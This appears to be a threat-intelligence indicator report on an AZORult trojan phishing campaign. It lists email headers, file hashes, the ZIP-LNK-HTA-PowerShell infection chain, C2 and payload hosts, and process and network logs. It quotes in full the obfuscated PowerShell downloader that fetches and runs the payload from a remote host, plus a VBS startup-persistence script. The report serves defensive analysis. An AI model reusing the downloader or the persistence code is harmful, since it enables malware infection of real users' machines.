- #IOC #OptiData #VR #AZORult #LNK #MSHTA #PowerShell
- https://pastebin.com/0bX17LaY
- previous_contact:
- --------------
- 17/09/18 https://pastebin.com/MwwZ7DyY
- FAQ:
- https://www.bleepingcomputer.com/news/security/azorult-trojan-steals-passwords-while-hiding-as-google-update/
- attack_vector
- --------------
- email attach .ZIP > .LNK > GET .HTA > PowerShell > GET .GIF(EXE) > %Public%\???.exe > %AppData%\0mbii\gsir.exe
- email_headers
- --------------
- Received: from jyotiimpex.co.in ([157.230.191.189])
- by srv8.victim0.com for <user00@org88.victim0.com>; (envelope-from admin@jyotiimpex.co.in)
- Reply-To: yakupabaci@ulasvana.com
- From: Biju Kurian <admin@jyotiimpex.co.in>
- To: user00@org88.victim0.com
- Subject: Attached proposal #506697
- Date: 08 Apr 2019 10:45:51 -0700
- files
- --------------
- SHA-256 71c5bd4bc1d84bfff6f83f87576bc7b6861b227ee85ed419a8b35a23c1f64455
- File name 506697.gif.zip [Zip archive data, at least v2.0 to extract]
- File size 624 B (624 bytes)
- SHA-256 67ad9399978fbf5f8efcb2c3e55d06d3bc26f9892ef18462137125455ad4fb80
- File name 506697.gif.lnk [MS Windows shortcut, window=hidenormalshowminimized]
- File size 1.65 KB (1686 bytes)
- SHA-256 f2bb4f19e758074b31ab6e00d6e1810af709d8ea8f6f9f1152d3954c67a339f1
- File name out-761452637.hta [HTML document, ASCII text, with very long lines]
- File size 4.28 KB (4387 bytes)
- SHA-256 3e3f7950441682275131bba6d26ac89941685652ec602011480302a616d2f53b
- File name 506697.gif [PE32 executable (GUI) Intel 80386, for MS Windows]
- File size 674 KB (690176 bytes)
- activity
- **************
- PL_SRC:
- gingerandcoblog{.} com/test/wp/out-761452637.hta [1st, initiate]
- gingerandcoblog{.} com/test/wp/506697.gif [2nd, main file]
- C2:
- cubaworts{.} gq//700/index.php
- Powershell
- "
- "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -Window 1 [void] $null;$bnFZCsAPHdW = Get-Random -Min 3 -Max 4;$AwQvehGyXOx = ([char[]]([char]97..[char]122));$uMoLAqAH = -join ($AwQvehGyXOx | Get-Random -Count $bnFZCsAPHdW | % {[Char]$_});$QBkXeDKCYCLy = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$fhMedM = $uMoLAqAH + $QBkXeDKCYCLy;$dlOPRLx=[char]0x53+[char]0x61+[char]0x4c;$XcjKCQxFekfTxHL=[char]0x49+[char]0x45+[char]0x58;$ZMIxPpGnUUPPRWE=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL jigvt $dlOPRLx;$VBStX=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;jigvt xambduhok $XcjKCQxFekfTxHL;$ITLGukyfdgq=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|xambduhok;jigvt igrvdkq $ZMIxPpGnUUPPRWE;$hJoIuIdIUjzbq = $ITLGukyfdgq + [char]0x5c + $fhMedM;;;;$chNKlgFcqw = 'aHR0cDovL2dpbmdlcmFuZGNvYmxvZy5jb20vdGVzdC93cC81MDY2OTcuZ2lm';$chNKlgFcqw=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($chNKlgFcqw));$QWTFrOflwfozpH = New-Object $VBStX;$JteOSk = $QWTFrOflwfozpH.DownloadData($chNKlgFcqw);[IO.File]::WriteAllBytes($hJoIuIdIUjzbq, $JteOSk);igrvdkq $hJoIuIdIUjzbq;;$NtkaFAJOmWuKn = @($wuHDKfhU, $sjRJmloYxc, $cfkBskr, $FugqnvRQKP);foreach($lvAJQrBp in $NtkaFAJOmWuKn){$null = $_}""
- "
- netwrk
- --------------
- 67.225.197.20 gingerandcoblog{.} com GET /test/wp/out-761452637.hta HTTP/1.1 Mozilla/4.0
- 67.225.197.20 gingerandcoblog{.} com GET /test/wp/506697.gif HTTP/1.1 No User Agent [!..This program must be run under Win32]
- 51.89.0.140 cubaworts{.} gq POST /700/index.php HTTP/1.1 Mozilla/4.0
- comp
- --------------
- mshta.exe 3428 TCP localhost 50097 67.225.197.20 80 SYN_SENT
- mshta.exe 3428 TCP localhost 50098 67.225.197.20 80 ESTABLISHED
- powershell.exe 3244 TCP localhost 50099 67.225.197.20 80 ESTABLISHED
- [System] 0 TCP localhost 50100 51.89.0.140 80 TIME_WAIT
- proc
- --------------
- "C:\Windows\system32\mshta.exe" h11p:\ gingerandcoblog{.} com/test/wp/out-761452637.hta
- "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -Window 1 [void] $null ...
- C:\Users\Public\qkn.exe
- C:\Users\operator\AppData\Roaming\0mbii\gsir.exe
- C:\Users\operator\AppData\Roaming\0mbii\gsir.exe
- "C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "gsir.exe"
- C:\Windows\system32\timeout.exe 3
- persist
- --------------
- C:\Users\operator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup 29.03.2019 11:03
- 0mbii.vbs
- c:\users\operator\appdata\roaming\microsoft\windows\start menu\programs\startup\0mbii.vbs 29.03.2019 11:03
- 0mbii.vbs
- - - - - -
- "
- SEt wdd = CreateObjEcT("wScRipt.shelL")
- WdD.Run """C:\Users\operator\AppData\Roaming\0mbii\gsir.exe"""
- "
- drop
- --------------
- C:\Users\Public\qkn.exe
- C:\Users\operator\AppData\Roaming\0mbii\gsir.exe [removed]
- C:\Users\operator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0mbii.vbs
- # # #
- https://www.virustotal.com/gui/file/71c5bd4bc1d84bfff6f83f87576bc7b6861b227ee85ed419a8b35a23c1f64455/details
- https://www.virustotal.com/gui/file/67ad9399978fbf5f8efcb2c3e55d06d3bc26f9892ef18462137125455ad4fb80/details
- https://www.virustotal.com/gui/file/f2bb4f19e758074b31ab6e00d6e1810af709d8ea8f6f9f1152d3954c67a339f1/details
- https://www.virustotal.com/gui/file/3e3f7950441682275131bba6d26ac89941685652ec602011480302a616d2f53b/details
- https://analyze.intezer.com/#/analyses/67953fad-ecb2-46b4-90d0-251e72079f8d
- VR